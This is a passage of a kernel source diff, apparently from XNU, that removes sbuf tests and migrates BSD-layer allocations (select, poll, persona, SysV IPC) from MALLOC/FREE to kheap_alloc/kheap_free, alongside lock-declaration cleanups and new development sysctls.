- { - struct sbuf *s = NULL; - const void *uptr = (const void *)req->newptr; - - s = sbuf_new(NULL, NULL, 16, 0); - SBUF_ASSERT_EQ(0, sbuf_bcopyin(s, uptr, 0)); - SBUF_ASSERT_EQ(0, s->s_len); - - sbuf_delete(s); - } - - SBUF_SHOULD("succeed in the simple case") - { - struct sbuf *s = NULL; - const void *uptr = (const void *)req->newptr; - size_t ulen = req->newlen; - - s = sbuf_new(NULL, NULL, 16, 0); - SBUF_ASSERT_EQ(0, sbuf_bcopyin(s, uptr, ulen)); - SBUF_ASSERT_EQ(ulen, (size_t)s->s_len); - - sbuf_delete(s); - } - - SBUF_SHOULD("fail for invalid userland addresses") - { - struct sbuf *s = NULL; - const void *uptr = (const void *)0xdeadUL; - size_t ulen = req->newlen; - - s = sbuf_new(NULL, NULL, 16, 0); - SBUF_ASSERT_EQ(-1, sbuf_bcopyin(s, uptr, ulen)); - SBUF_ASSERT_EQ(0, s->s_len); - - sbuf_delete(s); - } - - SBUF_SHOULD("fail for kernel addresses") - { - struct sbuf *s = NULL; - const void *uptr = "abcd"; - size_t ulen = 4; - - s = sbuf_new(NULL, NULL, 16, 0); - SBUF_ASSERT_EQ(-1, 
sbuf_bcopyin(s, uptr, ulen)); - SBUF_ASSERT_EQ(0, s->s_len); - - sbuf_delete(s); - } - - SBUF_SHOULD("fail if we don't have capacity for a fixed-len sbuf") - { - struct sbuf *s = NULL; - const void *uptr = (const void *)req->newptr; - size_t ulen = req->newlen; - int len_before; - - s = sbuf_new(NULL, NULL, 16, SBUF_FIXEDLEN); - SBUF_ASSERT_EQ(0, sbuf_cpy(s, "0123456789abcde")); - len_before = s->s_len; - SBUF_ASSERT_EQ(-1, sbuf_bcopyin(s, uptr, ulen)); - SBUF_ASSERT_EQ(len_before, s->s_len); - SBUF_ASSERT(SBUF_ISSET(s, SBUF_OVERFLOWED)); - - sbuf_delete(s); - } - - SBUF_SHOULD("auto-extend if we don't have capacity for an auto-extend sbuf") - { - struct sbuf *s = NULL; - const void *uptr = (const void *)req->newptr; - size_t ulen = req->newlen; - int len_before; - - s = sbuf_new(NULL, NULL, 16, SBUF_AUTOEXTEND); - SBUF_ASSERT_EQ(0, sbuf_cpy(s, "0123456789abcde")); - len_before = s->s_len; - SBUF_ASSERT_EQ(0, sbuf_bcopyin(s, uptr, ulen)); - SBUF_ASSERT_EQ(len_before + (int)ulen, s->s_len); - SBUF_ASSERT_NOT(SBUF_ISSET(s, SBUF_OVERFLOWED)); - - sbuf_delete(s); - } - - SBUF_SHOULD("fail if overflowed") - { - struct sbuf *s = NULL; - const void *uptr = (const void *)req->newptr; - size_t ulen = req->newlen; - - s = sbuf_new(NULL, NULL, 16, 0); - SBUF_SETFLAG(s, SBUF_OVERFLOWED); - SBUF_ASSERT_EQ(-1, sbuf_bcopyin(s, uptr, ulen)); - - sbuf_delete(s); - } - } - - SBUF_TESTING("sbuf_copyin") - { - SBUF_SHOULD("succeed in the simple case") - { - struct sbuf *s = NULL; - - s = sbuf_new(NULL, NULL, 16, SBUF_AUTOEXTEND); - SBUF_ASSERT_EQ(req->newlen + 1, sbuf_copyin(s, (const void *)req->newptr, req->newlen)); - SBUF_ASSERT_EQ(req->newlen, s->s_len); - - sbuf_delete(s); - } - - SBUF_SHOULD("use the sbuf capacity if len is zero") - { - struct sbuf *s = NULL; - - s = sbuf_new(NULL, NULL, 16, SBUF_AUTOEXTEND); - SBUF_ASSERT_EQ(req->newlen + 1, sbuf_copyin(s, (const void *)req->newptr, 0)); - SBUF_ASSERT_EQ(req->newlen, s->s_len); - - sbuf_delete(s); - } - - SBUF_SHOULD("fail if 
we can't extend the sbuf to accommodate") - { - struct sbuf *s = NULL; - - s = sbuf_new(NULL, NULL, 16, SBUF_FIXEDLEN); - SBUF_ASSERT_EQ(0, sbuf_cpy(s, "0123456789abcde")); - SBUF_ASSERT_EQ(-1, sbuf_copyin(s, (const void *)req->newptr, req->newlen)); - - sbuf_delete(s); - } - - SBUF_SHOULD("auto-extend the buffer if necessary") - { - struct sbuf *s = NULL; - int len_before; - - s = sbuf_new(NULL, NULL, 16, SBUF_AUTOEXTEND); - SBUF_ASSERT_EQ(0, sbuf_cpy(s, "0123456789abcde")); - len_before = s->s_len; - SBUF_ASSERT_NE(-1, sbuf_copyin(s, (const void *)req->newptr, req->newlen)); - SBUF_ASSERT_GT(len_before, s->s_len); - - sbuf_delete(s); - } - - SBUF_SHOULD("fail if the sbuf is overflowed") - { - struct sbuf *s = NULL; - - s = sbuf_new(NULL, NULL, 16, SBUF_AUTOEXTEND); - SBUF_SETFLAG(s, SBUF_OVERFLOWED); - SBUF_ASSERT_EQ(-1, sbuf_copyin(s, (const void *)req->newptr, req->newlen)); - - sbuf_delete(s); - } - - SBUF_SHOULD("fail gracefully for an invalid address") - { - struct sbuf *s = NULL; - - s = sbuf_new(NULL, NULL, 16, SBUF_AUTOEXTEND); - SBUF_ASSERT_EQ(-1, sbuf_copyin(s, (void *)0xdeadUL, req->newlen)); - - sbuf_delete(s); - } - - SBUF_SHOULD("fail gracefully for a kernel address") - { - struct sbuf *s = NULL; - const char *ptr = "abcd"; - - s = sbuf_new(NULL, NULL, 16, SBUF_AUTOEXTEND); - SBUF_ASSERT_EQ(-1, sbuf_copyin(s, ptr, strlen(ptr))); - - sbuf_delete(s); - } - } - SBUF_TEST_END; } diff --git a/bsd/kern/sys_generic.c b/bsd/kern/sys_generic.c index 77b32e3d4..1d88f75a8 100644 --- a/bsd/kern/sys_generic.c +++ b/bsd/kern/sys_generic.c @@ -152,6 +152,11 @@ /* for entitlement check */ #include +/* + * If you need accounting for KM_SELECT consider using + * KALLOC_HEAP_DEFINE to define a view. 
+ */ +#define KM_SELECT KHEAP_DEFAULT /* XXX should be in a header file somewhere */ extern kern_return_t IOBSDGetPlatformUUID(__darwin_uuid_t uuid, mach_timespec_t timeoutp); @@ -1210,6 +1215,36 @@ pselect_nocancel(struct proc *p, struct pselect_nocancel_args *uap, int32_t *ret return err; } +void +select_cleanup_uthread(struct _select *sel) +{ + kheap_free(KHEAP_DATA_BUFFERS, sel->ibits, 2 * sel->nbytes); + sel->ibits = sel->obits = NULL; + sel->nbytes = 0; +} + +static int +select_grow_uthread_cache(struct _select *sel, uint32_t nbytes) +{ + uint32_t *buf; + + buf = kheap_alloc(KHEAP_DATA_BUFFERS, 2 * nbytes, Z_WAITOK | Z_ZERO); + if (buf) { + select_cleanup_uthread(sel); + sel->ibits = buf; + sel->obits = buf + nbytes / sizeof(uint32_t); + sel->nbytes = nbytes; + return true; + } + return false; +} + +static void +select_bzero_uthread_cache(struct _select *sel) +{ + bzero(sel->ibits, sel->nbytes * 2); +} + /* * Generic implementation of {,p}select. Care: we type-pun uap across the two * syscalls, which differ slightly. The first 4 arguments (nfds and the fd sets) @@ -1226,7 +1261,6 @@ select_internal(struct proc *p, struct select_nocancel_args *uap, uint64_t timeo struct uthread *uth; struct _select *sel; struct _select_data *seldata; - int needzerofill = 1; int count = 0; size_t sz = 0; @@ -1266,35 +1300,11 @@ select_internal(struct proc *p, struct select_nocancel_args *uap, uint64_t timeo * it is not a POSIX compliant error code for select(). 
*/ if (sel->nbytes < (3 * ni)) { - int nbytes = 3 * ni; - - /* Free previous allocation, if any */ - if (sel->ibits != NULL) { - FREE(sel->ibits, M_TEMP); - } - if (sel->obits != NULL) { - FREE(sel->obits, M_TEMP); - /* NULL out; subsequent ibits allocation may fail */ - sel->obits = NULL; - } - - MALLOC(sel->ibits, u_int32_t *, nbytes, M_TEMP, M_WAITOK | M_ZERO); - if (sel->ibits == NULL) { - return EAGAIN; - } - MALLOC(sel->obits, u_int32_t *, nbytes, M_TEMP, M_WAITOK | M_ZERO); - if (sel->obits == NULL) { - FREE(sel->ibits, M_TEMP); - sel->ibits = NULL; + if (!select_grow_uthread_cache(sel, 3 * ni)) { return EAGAIN; } - sel->nbytes = nbytes; - needzerofill = 0; - } - - if (needzerofill) { - bzero((caddr_t)sel->ibits, sel->nbytes); - bzero((caddr_t)sel->obits, sel->nbytes); + } else { + select_bzero_uthread_cache(sel); } /* @@ -1347,14 +1357,14 @@ select_internal(struct proc *p, struct select_nocancel_args *uap, uint64_t timeo if (waitq_set_is_valid(uth->uu_wqset)) { waitq_set_deinit(uth->uu_wqset); } - FREE(uth->uu_wqset, M_SELECT); + kheap_free(KM_SELECT, uth->uu_wqset, uth->uu_wqstate_sz); } else if (uth->uu_wqstate_sz && !uth->uu_wqset) { panic("select: thread structure corrupt! " "uu_wqstate_sz:%ld, wqstate_buf == NULL", uth->uu_wqstate_sz); } uth->uu_wqstate_sz = sz; - MALLOC(uth->uu_wqset, struct waitq_set *, sz, M_SELECT, M_WAITOK); + uth->uu_wqset = kheap_alloc(KM_SELECT, sz, Z_WAITOK); if (!uth->uu_wqset) { panic("can't allocate %ld bytes for wqstate buffer", uth->uu_wqstate_sz); @@ -1834,6 +1844,7 @@ poll_nocancel(struct proc *p, struct poll_nocancel_args *uap, int32_t *retval) u_int nfds = uap->nfds; u_int rfds = 0; rlim_t nofile = proc_limitgetcur(p, RLIMIT_NOFILE, TRUE); + size_t ni = nfds * sizeof(struct pollfd); /* * This is kinda bogus. 
We have fd limits, but that is not @@ -1853,8 +1864,7 @@ poll_nocancel(struct proc *p, struct poll_nocancel_args *uap, int32_t *retval) } if (nfds) { - size_t ni = nfds * sizeof(struct pollfd); - MALLOC(fds, struct pollfd *, ni, M_TEMP, M_WAITOK); + fds = kheap_alloc(KHEAP_TEMP, ni, Z_WAITOK); if (NULL == fds) { error = EAGAIN; goto out; @@ -1979,9 +1989,7 @@ done: } out: - if (NULL != fds) { - FREE(fds, M_TEMP); - } + kheap_free(KHEAP_TEMP, fds, ni); kqueue_dealloc(kq); return error; @@ -3231,15 +3239,21 @@ SYSCTL_PROC(_machdep_remotetime, OID_AUTO, conversion_params, #endif /* CONFIG_MACH_BRIDGE_RECV_TIME */ #if DEVELOPMENT || DEBUG -#if __AMP__ + #include extern int32_t sysctl_get_bound_cpuid(void); -extern void sysctl_thread_bind_cpuid(int32_t cpuid); +extern kern_return_t sysctl_thread_bind_cpuid(int32_t cpuid); static int sysctl_kern_sched_thread_bind_cpu SYSCTL_HANDLER_ARGS { #pragma unused(oidp, arg1, arg2) + /* + * DO NOT remove this bootarg guard or make this non-development. + * This kind of binding should only be used for tests and + * experiments in a custom configuration, never shipping code. 
+ */ + if (!PE_parse_boot_argn("enable_skstb", NULL, 0)) { return ENOENT; } @@ -3254,7 +3268,15 @@ sysctl_kern_sched_thread_bind_cpu SYSCTL_HANDLER_ARGS } if (changed) { - sysctl_thread_bind_cpuid(new_value); + kern_return_t kr = sysctl_thread_bind_cpuid(new_value); + + if (kr == KERN_NOT_SUPPORTED) { + return ENOTSUP; + } + + if (kr == KERN_INVALID_VALUE) { + return ERANGE; + } } return error; @@ -3263,6 +3285,7 @@ sysctl_kern_sched_thread_bind_cpu SYSCTL_HANDLER_ARGS SYSCTL_PROC(_kern, OID_AUTO, sched_thread_bind_cpu, CTLTYPE_INT | CTLFLAG_RW | CTLFLAG_LOCKED, 0, 0, sysctl_kern_sched_thread_bind_cpu, "I", ""); +#if __AMP__ extern char sysctl_get_bound_cluster_type(void); extern void sysctl_thread_bind_cluster_type(char cluster_type); static int @@ -3404,6 +3427,12 @@ SYSCTL_INT(_kern, OID_AUTO, sched_edge_migrate_ipi_immediate, CTLFLAG_RW | CTLFL #endif /* CONFIG_SCHED_EDGE */ #endif /* __AMP__ */ + +/* used for testing by exception_tests */ +extern uint32_t ipc_control_port_options; +SYSCTL_INT(_kern, OID_AUTO, ipc_control_port_options, + CTLFLAG_RD | CTLFLAG_LOCKED, &ipc_control_port_options, 0, ""); + #endif /* DEVELOPMENT || DEBUG */ extern uint32_t task_exc_guard_default; diff --git a/bsd/kern/sys_persona.c b/bsd/kern/sys_persona.c index d44ad74bf..2889c1019 100644 --- a/bsd/kern/sys_persona.c +++ b/bsd/kern/sys_persona.c @@ -433,8 +433,8 @@ kpersona_find_syscall(user_addr_t infop, user_addr_t idp, user_addr_t idlenp) login = kinfo.persona_name[0] ? 
kinfo.persona_name : NULL; if (u_idlen > 0) { - MALLOC(persona, struct persona **, sizeof(*persona) * u_idlen, - M_TEMP, M_WAITOK | M_ZERO); + persona = kheap_alloc(KHEAP_TEMP, sizeof(*persona) * u_idlen, + Z_WAITOK | Z_ZERO); if (!persona) { error = ENOMEM; goto out; @@ -465,7 +465,7 @@ out: for (size_t i = 0; i < u_idlen; i++) { persona_put(persona[i]); } - FREE(persona, M_TEMP); + kheap_free(KHEAP_TEMP, persona, sizeof(*persona) * u_idlen); } (void)copyout(&k_idlen, idlenp, sizeof(u_idlen)); diff --git a/bsd/kern/sys_reason.c b/bsd/kern/sys_reason.c index 6a773e495..ed84e0ab5 100644 --- a/bsd/kern/sys_reason.c +++ b/bsd/kern/sys_reason.c @@ -35,12 +35,6 @@ #include #include -#if OS_REASON_DEBUG -#include - -extern int os_reason_debug_disabled; -#endif - extern int maxproc; /* @@ -52,25 +46,9 @@ static ZONE_DECLARE(os_reason_zone, "os reasons", os_refgrp_decl(static, os_reason_refgrp, "os_reason", NULL); -#define OS_REASON_RESERVE_COUNT 100 - static int os_reason_alloc_buffer_internal(os_reason_t cur_reason, uint32_t osr_bufsize, zalloc_flags_t flags); -void -os_reason_init(void) -{ - int reasons_allocated = 0; - - /* - * We pre-fill the OS reason zone to reduce the likelihood that - * the jetsam thread and others block when they create an exit - * reason. - */ - reasons_allocated = zfill(os_reason_zone, OS_REASON_RESERVE_COUNT); - assert(reasons_allocated >= OS_REASON_RESERVE_COUNT); -} - /* * Creates a new reason and initializes it with the provided reason * namespace and code. 
Also sets up the buffer and kcdata_descriptor diff --git a/bsd/kern/syscalls.master b/bsd/kern/syscalls.master index c2802385f..3d55687cd 100644 --- a/bsd/kern/syscalls.master +++ b/bsd/kern/syscalls.master @@ -856,7 +856,7 @@ 536 AUE_NULL ALL { int shared_region_map_and_slide_2_np(uint32_t files_count, const struct shared_file_np *files, uint32_t mappings_count, const struct shared_file_mapping_slide_np *mappings) NO_SYSCALL_STUB; } 537 AUE_NULL ALL { int pivot_root(const char *new_rootfs_path_before, const char *old_rootfs_path_after); } 538 AUE_TASKINSPECTFORPID ALL { int task_inspect_for_pid(mach_port_name_t target_tport, int pid, mach_port_name_t *t); } -539 AUE_TASKINSPECTFORPID ALL { int task_read_for_pid(mach_port_name_t target_tport, int pid, mach_port_name_t *t); } +539 AUE_TASKREADFORPID ALL { int task_read_for_pid(mach_port_name_t target_tport, int pid, mach_port_name_t *t); } 540 AUE_PREADV ALL { user_ssize_t sys_preadv(int fd, struct iovec *iovp, int iovcnt, off_t offset); } 541 AUE_PWRITEV ALL { user_ssize_t sys_pwritev(int fd, struct iovec *iovp, int iovcnt, off_t offset); } 542 AUE_PREADV ALL { user_ssize_t sys_preadv_nocancel(int fd, struct iovec *iovp, int iovcnt, off_t offset) NO_SYSCALL_STUB; } diff --git a/bsd/kern/sysv_msg.c b/bsd/kern/sysv_msg.c index 5769cf276..afddde8c2 100644 --- a/bsd/kern/sysv_msg.c +++ b/bsd/kern/sysv_msg.c @@ -103,17 +103,12 @@ struct msgmap *msgmaps; /* MSGSEG msgmap structures */ struct msg *msghdrs; /* MSGTQL msg headers */ struct msqid_kernel *msqids; /* MSGMNI msqid_kernel structs (wrapping user_msqid_ds structs) */ -static lck_grp_t *sysv_msg_subsys_lck_grp; -static lck_grp_attr_t *sysv_msg_subsys_lck_grp_attr; -static lck_attr_t *sysv_msg_subsys_lck_attr; -static lck_mtx_t sysv_msg_subsys_mutex; +static LCK_GRP_DECLARE(sysv_msg_subsys_lck_grp, "sysv_msg_subsys_lock"); +static LCK_MTX_DECLARE(sysv_msg_subsys_mutex, &sysv_msg_subsys_lck_grp); #define SYSV_MSG_SUBSYS_LOCK() lck_mtx_lock(&sysv_msg_subsys_mutex) 
#define SYSV_MSG_SUBSYS_UNLOCK() lck_mtx_unlock(&sysv_msg_subsys_mutex) -void sysv_msg_lock_init(void); - - #ifdef __APPLE_API_PRIVATE int msgmax, /* max chars in a message */ msgmni, /* max message queue identifiers */ @@ -131,18 +126,6 @@ struct msginfo msginfo = { }; #endif /* __APPLE_API_PRIVATE */ -/* Initialize the mutex governing access to the SysV msg subsystem */ -__private_extern__ void -sysv_msg_lock_init( void ) -{ - sysv_msg_subsys_lck_grp_attr = lck_grp_attr_alloc_init(); - - sysv_msg_subsys_lck_grp = lck_grp_alloc_init("sysv_msg_subsys_lock", sysv_msg_subsys_lck_grp_attr); - - sysv_msg_subsys_lck_attr = lck_attr_alloc_init(); - lck_mtx_init(&sysv_msg_subsys_mutex, sysv_msg_subsys_lck_grp, sysv_msg_subsys_lck_attr); -} - static __inline__ user_time_t sysv_msgtime(void) { @@ -252,30 +235,27 @@ msginit(__unused void *dummy) * if this fails, fail safely and leave it uninitialized (related * system calls will fail). */ - msgpool = (char *)_MALLOC(msginfo.msgmax, M_SHM, M_WAITOK); + msgpool = kheap_alloc(KHEAP_DATA_BUFFERS, msginfo.msgmax, Z_WAITOK); if (msgpool == NULL) { printf("msginit: can't allocate msgpool"); goto bad; } - MALLOC(msgmaps, struct msgmap *, - sizeof(struct msgmap) * msginfo.msgseg, - M_SHM, M_WAITOK); + msgmaps = kheap_alloc(KM_SHM, sizeof(struct msgmap) * msginfo.msgseg, + Z_WAITOK); if (msgmaps == NULL) { printf("msginit: can't allocate msgmaps"); goto bad; } - MALLOC(msghdrs, struct msg *, - sizeof(struct msg) * msginfo.msgtql, - M_SHM, M_WAITOK); + msghdrs = kheap_alloc(KM_SHM, sizeof(struct msg) * msginfo.msgtql, + Z_WAITOK); if (msghdrs == NULL) { printf("msginit: can't allocate msghdrs"); goto bad; } - MALLOC(msqids, struct msqid_kernel *, - sizeof(struct msqid_kernel) * msginfo.msgmni, - M_SHM, M_WAITOK); + msqids = kheap_alloc(KM_SHM, + sizeof(struct msqid_kernel) * msginfo.msgmni, Z_WAITOK); if (msqids == NULL) { printf("msginit: can't allocate msqids"); goto bad; @@ -319,18 +299,14 @@ msginit(__unused void *dummy) initted = 
1; bad: if (!initted) { - if (msgpool != NULL) { - _FREE(msgpool, M_SHM); - } - if (msgmaps != NULL) { - FREE(msgmaps, M_SHM); - } - if (msghdrs != NULL) { - FREE(msghdrs, M_SHM); - } - if (msqids != NULL) { - FREE(msqids, M_SHM); - } + kheap_free(KHEAP_DATA_BUFFERS, msgpool, + sizeof(struct msgmap) * msginfo.msgseg); + kheap_free(KM_SHM, msgmaps, + sizeof(struct msgmap) * msginfo.msgseg); + kheap_free(KM_SHM, msghdrs, + sizeof(struct msg) * msginfo.msgtql); + kheap_free(KM_SHM, msqids, + sizeof(struct msqid_kernel) * msginfo.msgmni); } return initted; } @@ -1467,12 +1443,11 @@ msgrcv_nocancel(struct proc *p, struct msgrcv_nocancel_args *uap, user_ssize_t * for (len = 0; len < msgsz; len += msginfo.msgssz) { size_t tlen; - /* compare input (size_t) value against restrict (int) value */ - if (msgsz > (size_t)msginfo.msgssz) { - tlen = msginfo.msgssz; - } else { - tlen = msgsz; - } + /* + * copy the full segment, or less if we're at the end + * of the message + */ + tlen = MIN(msgsz - len, (size_t)msginfo.msgssz); if (next <= -1) { panic("next too low #3"); } diff --git a/bsd/kern/sysv_sem.c b/bsd/kern/sysv_sem.c index cf284cd82..f7ab8e39c 100644 --- a/bsd/kern/sysv_sem.c +++ b/bsd/kern/sysv_sem.c @@ -78,7 +78,7 @@ #define MPRINTF(a) #endif -#define M_SYSVSEM M_TEMP +#define KM_SYSVSEM KHEAP_DEFAULT /* Hard system limits to avoid resource starvation / DOS attacks. 
@@ -133,27 +133,12 @@ static int semu_list_idx = -1; /* active undo structures */ struct sem_undo *semu = NULL; /* semaphore undo pool */ -void sysv_sem_lock_init(void); -static lck_grp_t *sysv_sem_subsys_lck_grp; -static lck_grp_attr_t *sysv_sem_subsys_lck_grp_attr; -static lck_attr_t *sysv_sem_subsys_lck_attr; -static lck_mtx_t sysv_sem_subsys_mutex; +static LCK_GRP_DECLARE(sysv_sem_subsys_lck_grp, "sysv_sem_subsys_lock"); +static LCK_MTX_DECLARE(sysv_sem_subsys_mutex, &sysv_sem_subsys_lck_grp); #define SYSV_SEM_SUBSYS_LOCK() lck_mtx_lock(&sysv_sem_subsys_mutex) #define SYSV_SEM_SUBSYS_UNLOCK() lck_mtx_unlock(&sysv_sem_subsys_mutex) - -__private_extern__ void -sysv_sem_lock_init( void ) -{ - sysv_sem_subsys_lck_grp_attr = lck_grp_attr_alloc_init(); - - sysv_sem_subsys_lck_grp = lck_grp_alloc_init("sysv_sem_subsys_lock", sysv_sem_subsys_lck_grp_attr); - - sysv_sem_subsys_lck_attr = lck_attr_alloc_init(); - lck_mtx_init(&sysv_sem_subsys_mutex, sysv_sem_subsys_lck_grp, sysv_sem_subsys_lck_attr); -} - static __inline__ user_time_t sysv_semtime(void) { @@ -283,8 +268,8 @@ grow_semu_array(int newSize) #ifdef SEM_DEBUG printf("growing semu[] from %d to %d\n", seminfo.semmnu, newSize); #endif - MALLOC(newSemu, struct sem_undo *, sizeof(struct sem_undo) * newSize, - M_SYSVSEM, M_WAITOK | M_ZERO); + newSemu = kheap_alloc(KM_SYSVSEM, sizeof(struct sem_undo) * newSize, + Z_WAITOK | Z_ZERO); if (NULL == newSemu) { #ifdef SEM_DEBUG printf("allocation failed. no changes made.\n"); @@ -298,14 +283,12 @@ grow_semu_array(int newSize) } /* * The new elements (from newSemu[i] to newSemu[newSize-1]) have their - * "un_proc" set to 0 (i.e. NULL) by the M_ZERO flag to MALLOC() above, - * so they're already marked as "not in use". + * "un_proc" set to 0 (i.e. NULL) by the Z_ZERO flag to kheap_alloc + * above, so they're already marked as "not in use". 
*/ /* Clean up the old array */ - if (semu) { - FREE(semu, M_SYSVSEM); - } + kheap_free(KM_SYSVSEM, semu, sizeof(struct sem_undo) * seminfo.semmnu); semu = newSemu; seminfo.semmnu = newSize; @@ -343,9 +326,8 @@ grow_sema_array(int newSize) #ifdef SEM_DEBUG printf("growing sema[] from %d to %d\n", seminfo.semmni, newSize); #endif - MALLOC(newSema, struct semid_kernel *, - sizeof(struct semid_kernel) * newSize, - M_SYSVSEM, M_WAITOK | M_ZERO); + newSema = kheap_alloc(KM_SYSVSEM, sizeof(struct semid_kernel) * newSize, + Z_WAITOK | Z_ZERO); if (NULL == newSema) { #ifdef SEM_DEBUG printf("allocation failed. no changes made.\n"); @@ -377,14 +359,13 @@ grow_sema_array(int newSize) /* * The new elements (from newSema[i] to newSema[newSize-1]) have their - * "sem_base" and "sem_perm.mode" set to 0 (i.e. NULL) by the M_ZERO - * flag to MALLOC() above, so they're already marked as "not in use". + * "sem_base" and "sem_perm.mode" set to 0 (i.e. NULL) by the Z_ZERO + * flag to kheap_alloc above, so they're already marked as "not in use". */ /* Clean up the old array */ - if (sema) { - FREE(sema, M_SYSVSEM); - } + kheap_free(KM_SYSVSEM, sema, + sizeof(struct semid_kernel) * seminfo.semmni); sema = newSema; seminfo.semmni = newSize; @@ -425,8 +406,8 @@ grow_sem_pool(int new_pool_size) #ifdef SEM_DEBUG printf("growing sem_pool array from %d to %d\n", seminfo.semmns, new_pool_size); #endif - MALLOC(new_sem_pool, struct sem *, sizeof(struct sem) * new_pool_size, - M_SYSVSEM, M_WAITOK | M_ZERO | M_NULL); + new_sem_pool = kheap_alloc(KM_SYSVSEM, sizeof(struct sem) * new_pool_size, + Z_WAITOK | Z_ZERO); if (NULL == new_sem_pool) { #ifdef SEM_DEBUG printf("allocation failed. 
no changes made.\n"); @@ -453,9 +434,7 @@ grow_sem_pool(int new_pool_size) sem_pool = new_sem_pool; /* clean up the old array */ - if (sem_free != NULL) { - FREE(sem_free, M_SYSVSEM); - } + kheap_free(KM_SYSVSEM, sem_free, sizeof(struct sem) * seminfo.semmns); seminfo.semmns = new_pool_size; #ifdef SEM_DEBUG @@ -606,8 +585,7 @@ semundo_adjust(struct proc *p, int *supidx, int semid, if (sueptr->une_adjval == 0) { suptr->un_cnt--; *suepptr = sueptr->une_next; - FREE(sueptr, M_SYSVSEM); - sueptr = NULL; + kheap_free(KM_SYSVSEM, sueptr, sizeof(struct undo)); } return 0; } @@ -624,8 +602,7 @@ semundo_adjust(struct proc *p, int *supidx, int semid, } /* allocate a new semaphore undo entry */ - MALLOC(new_sueptr, struct undo *, sizeof(struct undo), - M_SYSVSEM, M_WAITOK); + new_sueptr = kheap_alloc(KM_SYSVSEM, sizeof(struct undo), Z_WAITOK); if (new_sueptr == NULL) { return ENOMEM; } @@ -662,7 +639,7 @@ semundo_clear(int semid, int semnum) if (semnum == -1 || sueptr->une_num == semnum) { suptr->un_cnt--; *suepptr = sueptr->une_next; - FREE(sueptr, M_SYSVSEM); + kheap_free(KM_SYSVSEM, sueptr, sizeof(struct undo)); sueptr = *suepptr; continue; } @@ -1533,8 +1510,7 @@ semexit(struct proc *p) #endif suptr->un_cnt--; suptr->un_ent = sueptr->une_next; - FREE(sueptr, M_SYSVSEM); - sueptr = NULL; + kheap_free(KM_SYSVSEM, sueptr, sizeof(struct undo)); } } diff --git a/bsd/kern/sysv_shm.c b/bsd/kern/sysv_shm.c index 7e778e60d..a3a6ea933 100644 --- a/bsd/kern/sysv_shm.c +++ b/bsd/kern/sysv_shm.c @@ -109,10 +109,8 @@ #if SYSV_SHM static int shminit(void); -static lck_grp_t *sysv_shm_subsys_lck_grp; -static lck_grp_attr_t *sysv_shm_subsys_lck_grp_attr; -static lck_attr_t *sysv_shm_subsys_lck_attr; -static lck_mtx_t sysv_shm_subsys_mutex; +static LCK_GRP_DECLARE(sysv_shm_subsys_lck_grp, "sysv_shm_subsys_lock"); +static LCK_MTX_DECLARE(sysv_shm_subsys_mutex, &sysv_shm_subsys_lck_grp); #define SYSV_SHM_SUBSYS_LOCK() lck_mtx_lock(&sysv_shm_subsys_mutex) #define SYSV_SHM_SUBSYS_UNLOCK() 
lck_mtx_unlock(&sysv_shm_subsys_mutex) @@ -183,8 +181,6 @@ struct shminfo shminfo = { #endif /* __APPLE_API_PRIVATE */ -void sysv_shm_lock_init(void); - static __inline__ time_t sysv_shmtime(void) { @@ -277,7 +273,7 @@ shm_deallocate_segment(struct shmid_kernel *shmseg) shm_handle = shm_handle_next) { shm_handle_next = shm_handle->shm_handle_next; mach_memory_entry_port_release(shm_handle->shm_object); - FREE(shm_handle, M_SHM); + kheap_free(KM_SHM, shm_handle, sizeof(struct shm_handle)); } shmseg->u.shm_internal = USER_ADDR_NULL; /* tunnel */ size = vm_map_round_page(shmseg->u.shm_segsz, @@ -421,7 +417,7 @@ shmat(struct proc *p, struct shmat_args *uap, user_addr_t *retval) goto shmat_out; } - MALLOC(shmmap_s, struct shmmap_state *, size, M_SHM, M_WAITOK | M_NULL); + shmmap_s = kheap_alloc(KM_SHM, size, Z_WAITOK); if (shmmap_s == NULL) { shmat_ret = ENOMEM; goto shmat_out; @@ -838,7 +834,7 @@ shmget_allocate_segment(struct proc *p, struct shmget_args *uap, int mode, goto out; } - MALLOC(shm_handle, struct shm_handle *, sizeof(struct shm_handle), M_SHM, M_WAITOK); + shm_handle = kheap_alloc(KM_SHM, sizeof(struct shm_handle), Z_WAITOK); if (shm_handle == NULL) { kret = KERN_NO_SPACE; mach_memory_entry_port_release(mem_object); @@ -891,7 +887,7 @@ out: shm_handle = shm_handle_next) { shm_handle_next = shm_handle->shm_handle_next; mach_memory_entry_port_release(shm_handle->shm_object); - FREE(shm_handle, M_SHM); + kheap_free(KM_SHM, shm_handle, sizeof(struct shm_handle)); } shmseg->u.shm_internal = USER_ADDR_NULL; /* tunnel */ } @@ -1006,7 +1002,7 @@ shmfork(struct proc *p1, struct proc *p2) ret = 1; goto shmfork_out; } - MALLOC(shmmap_s, struct shmmap_state *, size, M_SHM, M_WAITOK); + shmmap_s = kheap_alloc(KM_SHM, size, Z_WAITOK); if (shmmap_s == NULL) { ret = 1; goto shmfork_out; @@ -1029,11 +1025,14 @@ static void shmcleanup(struct proc *p, int deallocate) { struct shmmap_state *shmmap_s; + size_t size = 0; + int nsegs = 0; SYSV_SHM_SUBSYS_LOCK(); shmmap_s = 
(struct shmmap_state *)p->vm_shm; for (; shmmap_s->shmid != SHMID_SENTINEL; shmmap_s++) { + nsegs++; if (SHMID_IS_VALID(shmmap_s->shmid)) { /* * XXX: Should the MAC framework enforce @@ -1043,8 +1042,10 @@ shmcleanup(struct proc *p, int deallocate) } } - FREE(p->vm_shm, M_SHM); - p->vm_shm = NULL; + if (os_add_and_mul_overflow(nsegs, 1, sizeof(struct shmmap_state), &size)) { + panic("shmcleanup: p->vm_shm buffer was correupted\n"); + } + kheap_free(KM_SHM, p->vm_shm, size); SYSV_SHM_SUBSYS_UNLOCK(); } @@ -1084,7 +1085,7 @@ shminit(void) return ENOMEM; } - MALLOC(shmsegs, struct shmid_kernel *, sz, M_SHM, M_WAITOK | M_ZERO); + shmsegs = zalloc_permanent(sz, ZALIGN_PTR); if (shmsegs == NULL) { return ENOMEM; } @@ -1104,18 +1105,6 @@ shminit(void) return 0; } -/* Initialize the mutex governing access to the SysV shm subsystem */ -__private_extern__ void -sysv_shm_lock_init( void ) -{ - sysv_shm_subsys_lck_grp_attr = lck_grp_attr_alloc_init(); - - sysv_shm_subsys_lck_grp = lck_grp_alloc_init("sysv_shm_subsys_lock", sysv_shm_subsys_lck_grp_attr); - - sysv_shm_subsys_lck_attr = lck_attr_alloc_init(); - lck_mtx_init(&sysv_shm_subsys_mutex, sysv_shm_subsys_lck_grp, sysv_shm_subsys_lck_attr); -} - /* (struct sysctl_oid *oidp, void *arg1, int arg2, \ * struct sysctl_req *req) */ 